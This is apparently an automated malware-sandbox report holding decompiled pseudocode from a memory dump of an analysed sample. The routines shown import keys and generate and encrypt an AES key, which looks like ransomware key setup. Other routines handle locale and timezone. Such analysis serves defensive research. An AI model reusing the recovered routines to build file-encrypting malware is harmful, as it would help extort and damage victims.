                          • Instruction ID: 6ac2e0e01b7db85b1b6c9ce454c7304ef3ba96f80195990e741fd8356f7daaa3
                          • Opcode Fuzzy Hash: aceb8b136bc6426930d51ff01db4ccf1f13d0e6023866cfb795d2554e45bae02
                          • Instruction Fuzzy Hash: AF41B675910319AFDB30DF64DC49B9AF77CFB14710F1442A9E609A7280EB746A88CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 81%
                          			E01309AF0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, char* _a4) {
                          				signed int _v8;
                          				int _v12;
                          				intOrPtr _v16;
                          				signed int _t17;
                          				char* _t19;
                          				signed char _t34;
                          				char* _t45;
                          				void* _t48;
                          				signed int _t49;
                          
                          				_t46 = __esi;
                          				_t17 =  *0x13a4018; // 0x39cca9f6
                          				_v8 = _t17 ^ _t49;
                          				_t45 = _a4;
                          				_t34 = 0;
                          				_v16 = __ecx;
                          				if(_t45[0x10] != 0) {
                          					_t19 = _t45;
                          					_v12 = 0;
                          					if(_t45[0x14] >= 0x10) {
                          						_t19 =  *_t45;
                          					}
                          					if(CryptStringToBinaryA(_t19, 0, 1, 0,  &_v12, 0, 0) != 0) {
                          						_push(_t46);
                          						_t48 = HeapAlloc(GetProcessHeap(), 0, _v12);
                          						if(_t48 != 0) {
                          							if(_t45[0x14] >= 0x10) {
                          								_t45 =  *_t45;
                          							}
                          							if(CryptStringToBinaryA(_t45, 0, 1, _t48,  &_v12, 0, 0) != 0) {
                          								CryptImportKey( *(_v16 + 0x5c), _t48, _v12, 0, 0, _v16 + 0x58);
                          								_t34 =  !=  ? 1 : _t34 & 0x000000ff;
                          							}
                          							HeapFree(GetProcessHeap(), 0, _t48);
                          						}
                          						_pop(_t46);
                          					}
                          					return E0132EA79(_v8 ^ _t49, _t46);
                          				} else {
                          					return E0132EA79(_v8 ^ _t49, __esi);
                          				}
                          			}

                          APIs
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 01309B44
                          • GetProcessHeap.KERNEL32 ref: 01309B52
                          • HeapAlloc.KERNEL32(00000000,00000000,00000000), ref: 01309B5C
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 01309B7E
                          • CryptImportKey.ADVAPI32(?,00000000,00000000,00000000,00000000,?), ref: 01309B9A
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01309BB0
                          • HeapFree.KERNEL32(00000000), ref: 01309BB7
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: Heap$Crypt$BinaryProcessString$AllocFreeImport
                          • String ID:
                          • API String ID: 1508550536-0
                          • Opcode ID: 8e97e524715dbc664e83ae8c57589ab2ba75dc3ace953692883691ec6b2230d7
                          • Instruction ID: 855e002762ce23cc32df62047e1137f62593a2dce805e2f220485f239382acae
                          • Opcode Fuzzy Hash: 8e97e524715dbc664e83ae8c57589ab2ba75dc3ace953692883691ec6b2230d7
                          • Instruction Fuzzy Hash: 75218231640204BBEB359FA5DC55F9ABBBCEF44724F50005AF605AB1C0D7B1A984CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 60%
                          			E01309BE0(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi) {
                          				int _v8;
                          				char _v16;
                          				signed int _v20;
                          				long* _v24;
                          				long* _v28;
                          				intOrPtr _v32;
                          				int _v36;
                          				char _v52;
                          				signed int _v56;
                          				int _v60;
                          				short _v76;
                          				intOrPtr _v80;
                          				int _v84;
                          				int _v88;
                          				char _v92;
                          				intOrPtr _v96;
                          				int _v100;
                          				char _v116;
                          				char _v117;
                          				int _v124;
                          				intOrPtr _v128;
                          				int _v132;
                          				char _v148;
                          				void* __esi;
                          				void* __ebp;
                          				signed int _t86;
                          				signed int _t87;
                          				long** _t89;
                          				long** _t92;
                          				int _t95;
                          				intOrPtr _t100;
                          				intOrPtr _t111;
                          				signed int _t112;
                          				char* _t121;
                          				intOrPtr _t124;
                          				intOrPtr _t127;
                          				char* _t138;
                          				void* _t147;
                          				char* _t152;
                          				void* _t153;
                          				intOrPtr* _t154;
                          				void* _t155;
                          				char* _t156;
                          				signed int _t157;
                          				void* _t158;
                          				void* _t159;
                          
                          				_t132 = __ebx;
                          				_t159 = _t158 - 0x84;
                          				_t86 =  *0x13a4018; // 0x39cca9f6
                          				_t87 = _t86 ^ _t157;
                          				_v20 = _t87;
                          				 *[fs:0x0] =  &_v16;
                          				_t154 = __ecx;
                          				_t89 =  &_v28;
                          				_v117 = 0;
                          				_v28 = 0;
                          				__imp__CryptAcquireContextW(_t89, 0, L"Microsoft Enhanced RSA and AES Cryptographic Provider", 0x18, 0xf0000000, _t87, __edi, _t153,  *[fs:0x0], 0x1366ddd, 0xffffffff);
                          				if(_t89 == 0) {
                          					L29:
                          					 *[fs:0x0] = _v16;
                          					_pop(_t155);
                          					return E0132EA79(_v20 ^ _t157, _t155);
                          				}
                          				_t92 =  &_v24;
                          				_v24 = 0;
                          				__imp__CryptGenKey(_v28, 0x6610, 1, _t92);
                          				if(_t92 != 0) {
                          					_t152 = E0130A050(_v24);
                          					_t95 = E01309150( *((intOrPtr*)(_t154 + 0x58)), 1, _t152);
                          					_v124 = _t95;
                          					if(_t152 != 0 && _t95 != 0) {
                          						_push(0);
                          						E012F7D00(__ebx,  &_v116, __edx, _t95);
                          						_v8 = 0;
                          						if(E0130A0E0(_v24,  &_v116, _t152) != 0 && E0130A0A0( *((intOrPtr*)(_t154 + 0x58)), 1,  &_v116, _t152, _v124) != 0) {
                          							_v88 = 0;
                          							_v84 = 2;
                          							_v80 = 0xc;
                          							_v92 = 0x1396adc;
                          							_v60 = 0;
                          							_v56 = 7;
                          							_v76 = 0;
                          							_v8 = 1;
                          							 *((intOrPtr*)( *_t154 + 4))( &_v92);
                          							E012F6850(__ebx,  &_v52,  &_v76, _t152);
                          							_v8 = 2;
                          							_v124 = _v36;
                          							_t152 = E01309150( *((intOrPtr*)(_t154 + 0x58)), 1, _t152);
                          							if(_v124 > 0 && _t152 != 0) {
                          								E013034B0(__ebx,  &_v52, _t152, _t152, 0);
                          								if(E0130A0A0( *((intOrPtr*)(_t154 + 0x58)), 1,  &_v52, _v124, _t152) != 0) {
                          									_t144 = _t154 + 0x6c;
                          									_t121 =  &_v52;
                          									if(_t154 + 0x6c != _t121) {
                          										_push(_v36);
                          										_t130 =  >=  ? _v52 : _t121;
                          										E012F7F00(_t132, _t144,  &_v76, _t152,  >=  ? _v52 : _t121);
                          									}
                          									_t152 = E0130A7C0(_t132,  &_v148,  &_v116,  &_v52);
                          									_t156 = _t154 + 0x1c;
                          									_t159 = _t159 + 4;
                          									if(_t156 != _t152) {
                          										_t127 =  *((intOrPtr*)(_t156 + 0x14));
                          										if(_t127 >= 0x10) {
                          											_push(_t127 + 1);
                          											E012F56A0(_t132, _t152,  *_t156);
                          											_t159 = _t159 + 8;
                          										}
                          										 *(_t156 + 0x10) = 0;
                          										 *((intOrPtr*)(_t156 + 0x14)) = 0xf;
                          										 *_t156 = 0;
                          										asm("movups xmm0, [edi]");
                          										asm("movups [esi], xmm0");
                          										asm("movq xmm0, [edi+0x10]");
                          										asm("movq [esi+0x10], xmm0");
                          										 *(_t152 + 0x10) = 0;
                          										 *((intOrPtr*)(_t152 + 0x14)) = 0xf;
                          										 *_t152 = 0;
                          									}
                          									_t124 = _v128;
                          									if(_t124 >= 0x10) {
                          										_push(_t124 + 1);
                          										E012F56A0(_t132, _t152, _v148);
                          										_t159 = _t159 + 8;
                          									}
                          									_v132 = 0;
                          									_v128 = 0xf;
                          									_v148 = 0;
                          									_v117 = 1;
                          								}
                          							}
                          							_t111 = _v32;
                          							if(_t111 >= 0x10) {
                          								_push(_t111 + 1);
                          								E012F56A0(_t132, _t152, _v52);
                          								_t159 = _t159 + 8;
                          							}
                          							_t112 = _v56;
                          							_v36 = 0;
                          							_v32 = 0xf;
                          							_v52 = 0;
                          							_v92 = 0x1396adc;
                          							if(_t112 >= 8) {
                          								_push(2 + _t112 * 2);
                          								E012F56A0(_t132, _t152, _v76);
                          								_t159 = _t159 + 8;
                          							}
                          							_v60 = 0;
                          							_v56 = 7;
                          							_v76 = 0;
                          							_v92 = 0x1396ae4;
                          						}
                          						_t100 = _v96;
                          						if(_t100 >= 0x10) {
                          							_push(_t100 + 1);
                          							E012F56A0(_t132, _t152, _v116);
                          						}
                          						_v100 = 0;
                          						_v96 = 0xf;
                          						_v116 = 0;
                          					}
                          					CryptDestroyKey(_v24);
                          				}
                          				CryptReleaseContext(_v28, 0);
                          				_t147 = 4;
                          				_t138 =  &_v28;
                          				do {
                          					 *_t138 = 0;
                          					_t138 = _t138 + 1;
                          					_t147 = _t147 - 1;
                          				} while (_t147 != 0);
                          				goto L29;
                          			}

                          APIs
                          • CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000,39CCA9F6,00000000), ref: 01309C2C
                          • CryptGenKey.ADVAPI32(00000000,00006610,00000001,?), ref: 01309C4F
                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 01309EA7
                            • Part of subcall function 0130A050: CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 0130A076
                            • Part of subcall function 01309150: CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0130917A
                          • CryptDestroyKey.ADVAPI32(00000000,?,00000001,00000000,00000000), ref: 01309E9C
                            • Part of subcall function 0130A0E0: CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000001,?,01309CA4,00000000,?,00000000,00000000,00000000,?,00000001,00000000), ref: 0130A0FC
                            • Part of subcall function 0130A0A0: CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000001,?,00000000,?,01309CBE,?,00000001,?,00000000,?,00000000,?), ref: 0130A0C2
                            • Part of subcall function 012F6850: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,00000000), ref: 012F6898
                            • Part of subcall function 012F6850: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 012F68E1
                          Strings
                          • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 01309C16
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: Crypt$ByteCharContextEncryptExportMultiWide$AcquireDestroyRelease
                          • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                          • API String ID: 854834478-63410773
                          • Opcode ID: 288a29be765e9ed1f7693c15b23f412f3a08ad6066ec0cc477b11f84fc1bd568
                          • Instruction ID: c71622b0c85040b383c8b9d272a80c7a3afe6cb66fe91b7dd806111713e499ed
                          • Opcode Fuzzy Hash: 288a29be765e9ed1f7693c15b23f412f3a08ad6066ec0cc477b11f84fc1bd568
                          • Instruction Fuzzy Hash: A0915C70810249AEEF21DFA4DC54BAEBFB5FF10308F24012CE559A72D2D7765989CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 94%
                          			E0135EA10(void* __ecx, signed int _a4, intOrPtr _a8) {
                          				short _v8;
                          				short _t17;
                          				signed int _t18;
                          				signed int _t23;
                          				signed int _t25;
                          				signed int _t26;
                          				signed int _t27;
                          				void* _t30;
                          				void* _t31;
                          				intOrPtr _t32;
                          				intOrPtr _t33;
                          				intOrPtr* _t36;
                          				intOrPtr* _t37;
                          
                          				_push(__ecx);
                          				_t23 = _a4;
                          				if(_t23 == 0) {
                          					L21:
                          					if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_v8, 2) != 0) {
                          						_t17 = _v8;
                          						if(_t17 == 0) {
                          							_t17 = GetACP();
                          						}
                          						L25:
                          						return _t17;
                          					}
                          					L22:
                          					_t17 = 0;
                          					goto L25;
                          				}
                          				_t18 = 0;
                          				if( *_t23 == 0) {
                          					goto L21;
                          				}
                          				_t36 = L"ACP";
                          				_t25 = _t23;
                          				while(1) {
                          					_t30 =  *_t25;
                          					if(_t30 !=  *_t36) {
                          						break;
                          					}
                          					if(_t30 == 0) {
                          						L7:
                          						_t26 = _t18;
                          						L9:
                          						if(_t26 == 0) {
                          							goto L21;
                          						}
                          						_t37 = L"OCP";
                          						_t27 = _t23;
                          						while(1) {
                          							_t31 =  *_t27;
                          							if(_t31 !=  *_t37) {
                          								break;
                          							}
                          							if(_t31 == 0) {
                          								L17:
                          								if(_t18 != 0) {
                          									_t17 = E013555C1(_t23, _t23);
                          									goto L25;
                          								}
                          								if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_v8, 2) == 0) {
                          									goto L22;
                          								}
                          								_t17 = _v8;
                          								goto L25;
                          							}
                          							_t32 =  *((intOrPtr*)(_t27 + 2));
                          							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
                          								break;
                          							}
                          							_t27 = _t27 + 4;
                          							_t37 = _t37 + 4;
                          							if(_t32 != 0) {
                          								continue;
                          							}
                          							goto L17;
                          						}
                          						asm("sbb eax, eax");
                          						_t18 = _t18 | 0x00000001;
                          						goto L17;
                          					}
                          					_t33 =  *((intOrPtr*)(_t25 + 2));
                          					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
                          						break;
                          					}
                          					_t25 = _t25 + 4;
                          					_t36 = _t36 + 4;
                          					if(_t33 != 0) {
                          						continue;
                          					}
                          					goto L7;
                          				}
                          				asm("sbb edx, edx");
                          				_t26 = _t25 | 0x00000001;
                          				goto L9;
                          			}

                          APIs
                          • GetLocaleInfoW.KERNEL32(00000000,2000000B,0135ED2E,00000002,00000000,?,?,?,0135ED2E,?,00000000), ref: 0135EAA9
                          • GetLocaleInfoW.KERNEL32(00000000,20001004,0135ED2E,00000002,00000000,?,?,?,0135ED2E,?,00000000), ref: 0135EAD2
                          • GetACP.KERNEL32(?,?,0135ED2E,?,00000000), ref: 0135EAE7
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: InfoLocale
                          • String ID: ACP$OCP
                          • API String ID: 2299586839-711371036
                          • Opcode ID: 4711e46738fa50abaa9cd9e672f90a31bf5435615bb9391ba3fb882e807a25cf
                          • Instruction ID: cdf96b15a57833836a16e0d0d03defa6b05a37611286d7ce6ae9b443e74268d1
                          • Opcode Fuzzy Hash: 4711e46738fa50abaa9cd9e672f90a31bf5435615bb9391ba3fb882e807a25cf
                          • Instruction Fuzzy Hash: 11216D62B40105AAFBB58F78C940EA7F6BBBB44E58B468474FD0AD7205E732DB40C350
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 75%
                          			E0135711A(void* __ebx, signed short* __edi, void* __eflags, signed short* _a4) {
                          				signed int _v8;
                          				signed int _v12;
                          				signed int _v16;
                          				signed int _v20;
                          				signed int _v24;
                          				intOrPtr* _v28;
                          				signed short _v32;
                          				signed int _v36;
                          				char _v76;
                          				intOrPtr _v80;
                          				intOrPtr _v84;
                          				signed int _v124;
                          				char _v528;
                          				intOrPtr _v532;
                          				char _v536;
                          				char _v636;
                          				char _v640;
                          				void* __esi;
                          				signed int _t82;
                          				signed int _t84;
                          				signed int _t88;
                          				signed int _t93;
                          				signed int _t101;
                          				signed int _t103;
                          				long _t105;
                          				signed int* _t108;
                          				signed int _t109;
                          				signed int _t117;
                          				signed int _t120;
                          				signed int _t123;
                          				signed short _t124;
                          				signed short _t129;
                          				void* _t131;
                          				void* _t141;
                          				signed int _t142;
                          				signed int _t144;
                          				void* _t146;
                          				void* _t147;
                          				signed int _t156;
                          				signed short _t158;
                          				void* _t159;
                          				void* _t161;
                          				signed int _t162;
                          				signed int _t163;
                          				signed int _t164;
                          				signed int _t165;
                          				signed int _t167;
                          				intOrPtr* _t168;
                          				signed short* _t170;
                          				intOrPtr* _t171;
                          				intOrPtr* _t172;
                          				signed int _t173;
                          				signed int _t187;
                          				signed short* _t189;
                          				signed short* _t195;
                          				void* _t200;
                          				signed int _t201;
                          				signed int _t202;
                          				signed short _t203;
                          				signed int _t204;
                          				signed short* _t205;
                          				signed int _t206;
                          				signed short* _t207;
                          				signed int _t209;
                          				void* _t210;
                          				signed short _t211;
                          				signed short _t212;
                          				signed short* _t213;
                          				intOrPtr* _t214;
                          				signed int _t215;
                          				signed int _t217;
                          				signed int _t223;
                          				signed int _t227;
                          				signed int _t231;
                          				void* _t232;
                          				void* _t233;
                          				void* _t235;
                          				signed int _t236;
                          				void* _t237;
                          				signed int _t238;
                          				void* _t244;
                          				void* _t245;
                          
                          				_t213 = __edi;
                          				_v28 = E01356A62();
                          				_v12 = E01356A68();
                          				_t167 = 0;
                          				_v32 = 0;
                          				_v8 = 0;
                          				_v16 = 0;
                          				if(E01356AC6( &_v8) != 0 || E01356A6E( &_v16) != 0) {
                          					L47:
                          					_push(_t167);
                          					_push(_t167);
                          					_push(_t167);
                          					_push(_t167);
                          					_push(_t167);
                          					E013496E7();
                          					asm("int3");
                          					_t235 = _t237;
                          					_t238 = _t237 - 0xc;
                          					_push(_t167);
                          					_push(_t217);
                          					_push(_t213);
                          					_t214 = E01356A62();
                          					_t168 = E01356A68();
                          					_v76 = 0;
                          					_v80 = 0;
                          					_v84 = 0;
                          					_t82 = E01356AC6( &_v76);
                          					__eflags = _t82;
                          					if(_t82 != 0) {
                          						L60:
                          						_push(0);
                          						_push(0);
                          						_push(0);
                          						_push(0);
                          						_push(0);
                          						E013496E7();
                          						asm("int3");
                          						_push(_t235);
                          						_t236 = _t238;
                          						_t84 =  *0x13a4018; // 0x39cca9f6
                          						_v124 = _t84 ^ _t236;
                          						 *0x13a446c =  *0x13a446c | 0xffffffff;
                          						 *0x13a4460 =  *0x13a4460 | 0xffffffff;
                          						_push(_t168);
                          						_push(0);
                          						_push(_t214);
                          						 *0x13ab4c8 = 0;
                          						_t88 = E01360687(__eflags,  &_v640,  &_v636, 0x100, 0x137ce0c);
                          						__eflags = _t88;
                          						if(_t88 != 0) {
                          							__eflags = _t88 - 0x22;
                          							if(_t88 == 0x22) {
                          								_t215 = E013576ED(_v532 + _v532);
                          								__eflags = _t215;
                          								if(__eflags != 0) {
                          									_t93 = E01360687(__eflags,  &_v536, _t215, _v532, 0x137ce0c);
                          									__eflags = _t93;
                          									if(_t93 == 0) {
                          										E01355C8F(0);
                          									} else {
                          										_push(_t215);
                          										goto L68;
                          									}
                          								} else {
                          									_push(0);
                          									L68:
                          									E01355C8F();
                          									_t215 = 0;
                          								}
                          							} else {
                          								_t215 = 0;
                          							}
                          						} else {
                          							_t215 =  &_v528;
                          						}
                          						asm("sbb esi, esi");
                          						_t223 =  ~(_t215 -  &_v528) & _t215;
                          						__eflags = _t215;
                          						if(_t215 == 0) {
                          							L76:
                          							L48();
                          						} else {
                          							__eflags =  *_t215;
                          							if(__eflags == 0) {
                          								goto L76;
                          							} else {
                          								_push(_t215);
                          								E0135711A(0, _t215, __eflags);
                          							}
                          						}
                          						E01355C8F(_t223);
                          						__eflags = _v16 ^ _t236;
                          						return E0132EA79(_v16 ^ _t236, _t223);
                          					} else {
                          						_t101 = E01356A6E( &_v16);
                          						__eflags = _t101;
                          						if(_t101 != 0) {
                          							goto L60;
                          						} else {
                          							_t103 = E01356A9A( &_v20);
                          							__eflags = _t103;
                          							if(_t103 != 0) {
                          								goto L60;
                          							} else {
                          								E01355C8F( *0x13ab4c0);
                          								 *0x13ab4c0 = 0;
                          								 *_t238 = 0x13ab4d0;
                          								_t105 = GetTimeZoneInformation(??);
                          								__eflags = _t105 - 0xffffffff;
                          								if(_t105 != 0xffffffff) {
                          									_t206 =  *0x13ab4d0 * 0x3c;
                          									_t187 = 1;
                          									__eflags =  *0x13ab516; // 0x0
                          									_t227 =  *0x13ab524; // 0x0
                          									 *0x13ab4c8 = 1;
                          									_v12 = _t206;
                          									if(__eflags != 0) {
                          										_t120 = _t227 * 0x3c + _t206;
                          										__eflags = _t120;
                          										_v12 = _t120;
                          									}
                          									__eflags =  *0x13ab56a;
                          									if( *0x13ab56a == 0) {
                          										L57:
                          										_t109 = 0;
                          										_t187 = 0;
                          										__eflags = 0;
                          									} else {
                          										_t117 =  *0x13ab578; // 0x0
                          										__eflags = _t117;
                          										if(_t117 == 0) {
                          											goto L57;
                          										} else {
                          											_t109 = (_t117 - _t227) * 0x3c;
                          										}
                          									}
                          									_v16 = _t187;
                          									_v20 = _t109;
                          									E013478D0(_t214,  *_t168, 0, 0x80);
                          									__eflags = 0;
                          									E013478D0(_t214,  *((intOrPtr*)(_t168 + 4)), 0, 0x80);
                          									E013478D0(_t214,  *_t214, 0, 0x40);
                          									E013478D0(_t214,  *((intOrPtr*)(_t214 + 4)), 0, 0x40);
                          									E013575FA(_t168, _t214, 0x13ab4d4,  *_t168,  *_t214, E0134B60D(_t206));
                          									E013575FA(_t168, _t214, 0x13ab528,  *((intOrPtr*)(_t168 + 4)),  *((intOrPtr*)(_t214 + 4)), _t114);
                          								}
                          								 *(E01356A5C()) = _v12;
                          								 *(E01356A50()) = _v16;
                          								_t108 = E01356A56();
                          								 *_t108 = _v20;
                          								return _t108;
                          							}
                          						}
                          					}
                          				} else {
                          					_t123 =  *0x13ab4c0; // 0x0
                          					_t213 = _a4;
                          					if(_t123 == 0) {
                          						L11:
                          						_t189 = _t213;
                          						_t11 =  &(_t189[1]); // 0x13575de
                          						_t207 = _t11;
                          						do {
                          							_t124 =  *_t189;
                          							_t189 =  &(_t189[1]);
                          						} while (_t124 != _t167);
                          						_t231 = E013576ED(2 + (_t189 - _t207 >> 1) * 2);
                          						if(_t231 == 0) {
                          							L44:
                          							return E01355C8F(_t231);
                          						}
                          						E01355C8F( *0x13ab4c0);
                          						_t195 = _t213;
                          						_t208 = _t231;
                          						_t217 = _t167;
                          						 *0x13ab4c0 = _t231;
                          						_v24 = _t217;
                          						_t15 =  &(_t195[1]); // 0x13575de
                          						_t170 = _t15;
                          						do {
                          							_t129 =  *_t195;
                          							_t195 =  &(_t195[1]);
                          						} while (_t129 != _v32);
                          						_t17 = (_t195 - _t170 >> 1) + 1; // 0x13575db
                          						_t131 = E01352808(_t208, _t17, _t213);
                          						_t237 = _t237 + 0xc;
                          						if(_t131 == 0) {
                          							_t171 = _v12;
                          							E013478D0(_t213,  *_t171, _t131, 0x80);
                          							_t19 = _t171 + 4; // 0xfffffdd7
                          							E013478D0(_t213,  *_t19, 0, 0x80);
                          							_t172 = _v28;
                          							E013478D0(_t213,  *_t172, 0, 0x40);
                          							E013478D0(_t213,  *((intOrPtr*)(_t172 + 4)), 0, 0x40);
                          							_push(3);
                          							_push( *_t172);
                          							_push( *_v12);
                          							E013570D3(_t172, _t213, _t213);
                          							_t244 = _t237 + 0x40;
                          							_t141 = 3;
                          							do {
                          								if( *_t213 != 0) {
                          									_t213 =  &(_t213[1]);
                          								}
                          								_t141 = _t141 - 1;
                          							} while (_t141 != 0);
                          							_t142 =  *_t213 & 0x0000ffff;
                          							_v36 = _t142;
                          							_t200 = 0x2d;
                          							if(_t142 == _t200) {
                          								_t213 =  &(_t213[1]);
                          							}
                          							_t144 = E0134B3BC(_t200, _t213,  &_v20, 0xa);
                          							_t245 = _t244 + 0xc;
                          							_t173 = _t144 * 0xe10;
                          							_v8 = _t173;
                          							while(1) {
                          								_t201 =  *_t213 & 0x0000ffff;
                          								if(_t201 != 0x2b && _t201 - 0x30 > 9) {
                          									break;
                          								}
                          								_t213 =  &(_t213[1]);
                          							}
                          							_t146 = 0x3a;
                          							__eflags = _t201 - _t146;
                          							if(_t201 != _t146) {
                          								L39:
                          								_t147 = 0x2d;
                          								__eflags = _v36 - _t147;
                          								if(_v36 == _t147) {
                          									_t173 =  ~_t173;
                          									_v8 = _t173;
                          								}
                          								_t202 =  *_t213 & 0x0000ffff;
                          								__eflags = _t202;
                          								_v16 = 0 | _t202 != 0x00000000;
                          								__eflags = _t202;
                          								if(_t202 != 0) {
                          									_push(3);
                          									_push( *((intOrPtr*)(_v28 + 4)));
                          									_push( *((intOrPtr*)(_v12 + 4)));
                          									E013570D3(_t173, _t213, _t213);
                          									_t173 = _v8;
                          								}
                          								 *(E01356A5C()) = _t173;
                          								 *(E01356A50()) = _v16;
                          								goto L44;
                          							}
                          							_t213 =  &(_t213[1]);
                          							_t156 = E0134B3BC(_t201, _t213,  &_v20, 0xa);
                          							_t245 = _t245 + 0xc;
                          							_t203 = 0x30;
                          							_t173 = _v8 + _t156 * 0x3c;
                          							_v32 = _t203;
                          							_t158 =  *_t213 & 0x0000ffff;
                          							_v8 = _t173;
                          							_t209 = _t158;
                          							__eflags = _t158 - _t203;
                          							if(_t158 < _t203) {
                          								L33:
                          								_t159 = 0x3a;
                          								__eflags = _t209 - _t159;
                          								if(_t209 != _t159) {
                          									goto L39;
                          								}
                          								_t213 =  &(_t213[1]);
                          								_t161 = E0134B3BC(_t203, _t213,  &_v20, 0xa);
                          								_t245 = _t245 + 0xc;
                          								_t173 = _v8 + _t161;
                          								_t162 =  *_t213 & 0x0000ffff;
                          								_v8 = _t173;
                          								_t210 = 0x30;
                          								__eflags = _t162 - _t210;
                          								if(_t162 < _t210) {
                          									goto L39;
                          								}
                          								_t204 = _t162;
                          								_t232 = 0x39;
                          								while(1) {
                          									__eflags = _t204 - _t232;
                          									if(_t204 > _t232) {
                          										break;
                          									}
                          									_t213 =  &(_t213[1]);
                          									_t163 =  *_t213 & 0x0000ffff;
                          									_t204 = _t163;
                          									__eflags = _t163 - _t210;
                          									if(_t163 >= _t210) {
                          										continue;
                          									}
                          									break;
                          								}
                          								_t231 = _v24;
                          								goto L39;
                          							}
                          							_t203 = _t158;
                          							_t233 = 0x39;
                          							while(1) {
                          								_t209 = _t203 & 0x0000ffff;
                          								__eflags = _t203 - _t233;
                          								if(_t203 > _t233) {
                          									break;
                          								}
                          								_t213 =  &(_t213[1]);
                          								_t164 =  *_t213 & 0x0000ffff;
                          								_t203 = _t164;
                          								_t209 = _t164;
                          								__eflags = _t164 - _v32;
                          								if(_t164 >= _v32) {
                          									continue;
                          								}
                          								break;
                          							}
                          							_t231 = _v24;
                          							goto L33;
                          						}
                          						_t167 = 0;
                          						__eflags = 0;
                          						goto L47;
                          					} else {
                          						_t205 = _t213;
                          						while(1) {
                          							_t211 =  *_t205;
                          							if(_t211 !=  *_t123) {
                          								break;
                          							}
                          							if(_t211 == 0) {
                          								L8:
                          								_t165 = _t167;
                          							} else {
                          								_t9 =  &(_t205[1]); // 0xfdd7e805
                          								_t212 =  *_t9;
                          								if(_t212 !=  *((intOrPtr*)(_t123 + 2))) {
                          									break;
                          								} else {
                          									_t205 =  &(_t205[2]);
                          									_t123 = _t123 + 4;
                          									if(_t212 != 0) {
                          										continue;
                          									} else {
                          										goto L8;
                          									}
                          								}
                          							}
                          							L10:
                          							if(_t165 == 0) {
                          								return _t165;
                          							} else {
                          								goto L11;
                          							}
                          							goto L78;
                          						}
                          						asm("sbb eax, eax");
                          						_t165 = _t123 | 0x00000001;
                          						__eflags = _t165;
                          						goto L10;
                          					}
                          				}
                          				L78:
                          			}

                          APIs
                          • _free.LIBCMT ref: 013571D7
                          • _free.LIBCMT ref: 013573A3
                          • _free.LIBCMT ref: 0135741B
                          • GetTimeZoneInformation.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,013575DC,?,?,00000000), ref: 0135742D
                          Memory Dump Source
